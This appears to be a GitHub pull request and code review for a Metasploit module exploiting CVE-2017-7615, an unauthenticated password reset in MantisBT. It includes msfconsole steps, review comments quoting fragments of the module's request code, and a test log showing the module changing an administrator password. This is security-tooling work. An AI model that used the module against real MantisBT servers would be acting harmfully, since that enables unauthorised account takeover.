
Add a module for CVE-2017-7615 #8671

Merged
merged 9 commits into from Jul 12, 2017


jvoisin commented Jul 9, 2017

Add a module for CVE-2017-7615, aka an unauthenticated password reset in MantisBT.

Verification

List the steps needed to make sure this thing works

  • Set up MantisBT (you can get version 1.3.0 here or from sourceforge)
  • Start msfconsole
  • use auxiliary/admin/http/mantisbt_password_reset
  • set RHOST <target IP>
  • Verify that the module outputs [+] Password successfully changed to …
  • Verify that the password works

jvoisin added some commits Jul 9, 2017

4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfulyl changed.

bcoles Jul 9, 2017

"successfully"

['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']

bcoles Jul 9, 2017

Inconsistent indentation

],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Apr 16, 2017"))

bcoles Jul 9, 2017

I don't think , is allowed in DisclosureDate.

Make sure you run tools/dev/msftidy.rb

jvoisin Jul 9, 2017

It doesn't raise any warnings here.

'vars_post' => {
'verify_user_id' => datastore['USERID'],
'account_update_token' => $1,
'realname' => 'jvoisin',

bcoles Jul 9, 2017

Can the realname be randomized? Rex::Text.rand_text_alpha(rand(5) + 8)

jvoisin Jul 9, 2017

Sure

password = datastore['PASSWORD']
end

res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/

bcoles Jul 9, 2017

Is this meant to be an if conditional?

jvoisin Jul 9, 2017

Nope, it's meant to get the token later, with $1.

bcoles Jul 9, 2017

Will MantisBT accept the request if the account_update_token is '' ?

If not, it might be nice to handle this scenario, with something like:

if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
  token = $1
else
  fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
end

jvoisin Jul 9, 2017

Sure ♥
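The token-extraction guard discussed in this review thread, as an added stand-alone example (it is not the module's own code and does not use Metasploit's API): a regex-based parser for the hidden account_update_token field that distinguishes a present token from a missing one instead of silently passing an unset $1 along. The two HTML bodies and the TokenNotFound class are constructed for this example; inside a module, the raise would be the fail_with(Failure::UnexpectedReply, ...) call shown in the comment above.

```ruby
# Added example, not the module's code: parse a hidden-input token out of an
# HTML form body and treat its absence as an explicit, reported failure.

# The same pattern the module uses to locate the hidden token field.
TOKEN_RE = /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/

# Stand-in for a module's Failure::UnexpectedReply (constructed for this example).
class TokenNotFound < StandardError; end

# Returns the token string, or raises TokenNotFound with a descriptive message.
# A bare `body =~ TOKEN_RE` with no branch would leave $1 nil on a miss and the
# caller would continue with an empty token, which is the scenario the review
# asks to handle.
def extract_account_update_token(body)
  if body =~ TOKEN_RE
    $1
  else
    raise TokenNotFound, 'Could not retrieve account_update_token'
  end
end

# Non-raising variant: nil signals "no token in this response", so the caller
# can decide how to report it.
def account_update_token_or_nil(body)
  m = TOKEN_RE.match(body)
  m && m[1]
end

# Constructed sample response bodies (not captured from a real server).
FORM_WITH_TOKEN = <<~HTML
  <form method="post" action="account_update.php">
    <input type="hidden" name="account_update_token" value="AbC123_-xyz"/>
    <input type="text" name="realname" value=""/>
  </form>
HTML

FORM_WITHOUT_TOKEN = <<~HTML
  <html><body><p>Invalid or expired confirmation link.</p></body></html>
HTML

if __FILE__ == $0
  puts extract_account_update_token(FORM_WITH_TOKEN)
  p account_update_token_or_nil(FORM_WITHOUT_TOKEN)
  begin
    extract_account_update_token(FORM_WITHOUT_TOKEN)
  rescue TokenNotFound => e
    puts "failed as expected: #{e.message}"
  end
end
```

The raising form is the one that maps onto fail_with in a module; the nil-returning form is handier when the caller wants to retry or log rather than abort.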

['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,

bcoles Jul 9, 2017

Privileged can be removed for auxiliary modules.

if datastore['PASSWORD'].blank?
password = Rex::Text.rand_text_alpha(8)
else
password = datastore['PASSWORD']

bcoles Jul 9, 2017

Does MantisBT make use of a password complexity policy? It might be nice to print_warning if the specified password is too weak to pass the complexity requirements.

jvoisin Jul 9, 2017

Absolutely not :D


bcoles commented Jul 9, 2017

Thanks @jvoisin !

jvoisin added some commits Jul 9, 2017

[
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']

bcoles Jul 9, 2017

Missing comma , at end of line.

@pbarry-r7 pbarry-r7 self-assigned this Jul 12, 2017


pbarry-r7 commented Jul 12, 2017

Verified, works as advertised for me (and did, indeed, change my Administrator account's password!):

$ ./msfconsole -q
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > set TARGETURI mantisbt
TARGETURI => mantisbt
msf auxiliary(mantisbt_password_reset) > run

[+] Password successfully changed to 'KEYooXFe'.
[*] Auxiliary module execution completed

I have a few very minor style (and one spelling) tweaks; will commit then land. Thanks, @jvoisin!

pbarry-r7 added some commits Jul 12, 2017

@pbarry-r7 pbarry-r7 merged commit 5802196 into rapid7:master Jul 12, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

pbarry-r7 added a commit that referenced this pull request Jul 12, 2017


pbarry-r7 commented Jul 12, 2017

Release Notes

The ability to reset the password associated with any user ID for vulnerable versions of MantisBT has been added.
